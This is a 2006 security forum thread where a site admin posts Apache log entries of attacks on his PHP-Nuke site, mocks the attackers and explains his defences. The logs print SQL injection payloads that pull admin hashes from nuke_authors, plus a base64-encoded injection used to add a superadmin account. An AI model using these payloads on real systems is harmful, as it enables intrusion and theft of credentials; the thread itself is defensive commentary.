|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
Funny entries from www.waraxe.us webserver logs :) |
|
Posted: Thu Jun 22, 2006 1:13 pm |
|
|
waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
|
|
|
|
|
Seems that there are lots of wannabes, trying to "administer" my website.
Many funny attack patterns can be seen in Apache logs every day, here are examples for 21. june 2006
Wtf is this? My own base64 encoded attack string, used in TOTALLY WRONG context? Lame ...
Code: |
85.100.188.119 - - [21/Jun/2006:11:53:30 +0300] "GET /admin.php?op...0VMRUNUIDEvKjox HTTP/1.1" 401 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
85.100.188.119 - iky [21/Jun/2006:11:53:38 +0300] "GET /admin.php?op...0VMRUNUIDEvKjox HTTP/1.1" 401 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
85.100.188.119 - iky [21/Jun/2006:11:53:40 +0300] "GET /admin.php?op...0VMRUNUIDEvKjox HTTP/1.1" 401 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
85.100.188.119 - iky [21/Jun/2006:11:53:45 +0300] "GET /admin.php?op...0VMRUNUIDEvKjox HTTP/1.1" 401 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
85.100.188.119 - - [21/Jun/2006:11:53:50 +0300] "GET /admin.php?op...0VMRUNUIDEvKjox HTTP/1.1" 401 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
85.100.188.119 - iky [21/Jun/2006:11:53:50 +0300] "GET /admin.php?op...0VMRUNUIDEvKjox HTTP/1.1" 401 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
85.100.188.119 - iky [21/Jun/2006:11:53:52 +0300] "GET /admin.php?op...0VMRUNUIDEvKjox HTTP/1.1" 401 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
85.100.188.119 - iky [21/Jun/2006:11:53:57 +0300] "GET /admin.php?op...0VMRUNUIDEvKjox HTTP/1.1" 401 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
85.100.188.119 - iky [21/Jun/2006:11:54:01 +0300] "GET /admin.php?op...0VMRUNUIDEvKjox HTTP/1.1" 401 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
|
Someone is trying to log in as admin, but got hammered by additionial authentication.
By the way - "hacker" is nonvalid username
Code: |
85.103.160.11 - - [21/Jun/2006:14:03:41 +0300] "POST //admin.php HTTP/1.1" 401 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; HbTools 4.7.7)"
85.103.160.11 - hacker [21/Jun/2006:14:03:50 +0300] "POST //admin.php HTTP/1.1" 401 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; HbTools 4.7.7)"
85.103.160.11 - hacker [21/Jun/2006:14:03:54 +0300] "POST //admin.php HTTP/1.1" 401 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; HbTools 4.7.7)"
85.103.160.11 - hacker [21/Jun/2006:14:04:00 +0300] "POST //admin.php HTTP/1.1" 401 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; HbTools 4.7.7)"
85.103.160.11 - - [21/Jun/2006:14:04:06 +0300] "POST //admin.php HTTP/1.1" 401 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; HbTools 4.7.7)"
85.103.160.11 - hacker [21/Jun/2006:14:04:06 +0300] "POST //admin.php HTTP/1.1" 401 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; HbTools 4.7.7)"
85.103.160.11 - - [21/Jun/2006:14:04:12 +0300] "POST //admin.php HTTP/1.1" 401 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; HbTools 4.7.7)"
85.103.160.11 - hacker [21/Jun/2006:14:04:13 +0300] "POST //admin.php HTTP/1.1" 401 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; HbTools 4.7.7)"
85.103.160.11 - - [21/Jun/2006:14:04:44 +0300] "POST //admin.php HTTP/1.1" 401 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; HbTools 4.7.7)"
85.103.160.11 - hacker [21/Jun/2006:14:04:45 +0300] "POST //admin.php HTTP/1.1" 401 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; HbTools 4.7.7)"
85.103.160.11 - hacker [21/Jun/2006:14:04:51 +0300] "POST //admin.php HTTP/1.1" 401 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; HbTools 4.7.7)"
85.103.160.11 - hacker [21/Jun/2006:14:05:02 +0300] "POST //admin.php HTTP/1.1" 401 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; HbTools 4.7.7)"
85.107.215.7 - - [21/Jun/2006:14:05:15 +0300] "POST //admin.php HTTP/1.1" 401 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
|
Another funny attack - using MY OWN invention against MYSELF
Again - error 401 will hammer "attacker" down
Code: |
80.69.48.174 - - [21/Jun/2006:23:40:05 +0300] "GET /admin.php?op=AddAuthor&add_aid=PcDelisi&add_name=God&add_pwd=123123&add_email=pcdelisi@hackermail.com&add_radminsuper=1&admin=eCcgVU5JT04gU0VMRUNUIDEvKjox HTTP/1.1" 301 246 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; EasyNET 5.4 Professional; MRA 4.4 (build 01348); .NET CLR 1.1.4322)"
|
Whoah, we have sql injection expert here. He/she uses AGAIN my own exploit against me
Wtf?
Code: |
81.12.75.10 - - [21/Jun/2006:00:15:25 +0300] "GET /modules.php?name=Search&type=stories&query=f00bar&category=-1&categ=%20and%201=2%20UNION%20SELECT%200,0,aid,aid,0,0,0,0,0,0%20from%20nuke_authors/* HTTP/1.0" 200 7682 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Media Center PC 3.0; .NET CLR 1.0.3705)"
81.12.75.10 - - [21/Jun/2006:00:15:44 +0300] "GET /modules.php?name=Journal&file=search&bywhat=aid&exact=1&forwhat=kala'/**/UNION/**/SELECT/**/0,0,pwd,0,0,0,0,0,0/**/FROM/**/nuke_authors/**/WHERE/**/radminsuper=1/**/LIMIT/**/1/* HTTP/1.0" 200 7660 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Media Center PC 3.0; .NET CLR 1.0.3705)"
81.12.75.10 - - [21/Jun/2006:00:15:57 +0300] "GET /modules.php?name=Search&type=comments&query=not123exists&instory=/**/UNION/**/SELECT/**/0,0,pwd,0,aid/**/FROM/**/nuke_authors HTTP/1.0" 200 7662 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Media Center PC 3.0; .NET CLR 1.0.3705)"
81.12.75.10 - - [21/Jun/2006:00:16:04 +0300] "GET /modules.php?name=Search&type=comments&query=not123exists&instory=/%2a%2a/UNION/%2a%2a/SELECT/%2a%2a/0,0,pwd,0,aid/%2a%2a/FROM/%2a%2a/nuke_authors HTTP/1.0" 200 7662 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Media Center PC 3.0; .NET CLR 1.0.3705)"
81.12.75.10 - - [21/Jun/2006:00:16:11 +0300] "GET /modules.php?name=Sections&op=viewarticle&artid=-1%20UNION%20SELECT%200,0,aid,pwd,0%20FROM%20nuke_authors HTTP/1.0" 200 7621 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Media Center PC 3.0; .NET CLR 1.0.3705)"
|
For all of the wannabes:
1. You can't use admin.php, if you don't know valid username/password pair for Apache auth.
Both username and password are too good to guess or bruteforce.
Even when you get through, you have to know phpnuke admin password.
2. UNION trick will not work, because I have changed default table names in Phpnuke installation.
"%20UNION%20SELECT%200,0,aid,pwd,0%20FROM%20nuke_authors" gives you nothing, because there is no "nuke_authors"
3. Classical xss and sql injection tricks through GET attack vector will fail, because of the very restrict allowed charset
in URL. Try "/", "*" or something else and all you will get, is:
Alarma - one or more problems in progress:
Browser request URI contains forbidden characters, serving default page...
By the way, I will update regulary this list of lamest attack attemps.
Enjoy the summer and have a nice day |
|
Last edited by waraxe on Wed Apr 16, 2008 11:02 pm; edited 1 time in total |
|
|
|
|
|
|
|
Posted: Thu Jun 22, 2006 8:53 pm |
|
|
techwizz78 |
Regular user |
|
|
Joined: Jun 19, 2006 |
Posts: 5 |
|
|
|
|
|
|
|
How funny is that.... |
|
|
|
|
Posted: Tue Jun 27, 2006 2:20 pm |
|
|
y3dips |
Valuable expert |
|
|
Joined: Feb 25, 2005 |
Posts: 281 |
Location: Indonesia |
|
|
|
|
|
|
same to me, they (kiddies) tries to attack my admin [phpBB] directory also same as u [waraxe], i`ve already changed the name for along time ago.
it workz for them , just knowing how to type
./exploit.pl path-to-url
hhhehehheheheh |
|
_________________ IO::y3dips->new(http://clog.ammar.web.id); |
|
|
|
Posted: Mon Jan 08, 2007 11:25 pm |
|
|
DeadLink |
Beginner |
|
|
Joined: Jan 09, 2007 |
Posts: 2 |
|
|
|
|
|
|
|
they will not stop trying,, |
|
|
|
|
Posted: Wed Jan 17, 2007 8:05 pm |
|
|
superninja |
Active user |
|
|
Joined: Jul 03, 2006 |
Posts: 38 |
|
|
|
|
|
|
|
i want to thank you for this great security portal i learned much!
Here take this
|
|
|
|
|
www.waraxe.us Forum Index -> General discussion
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|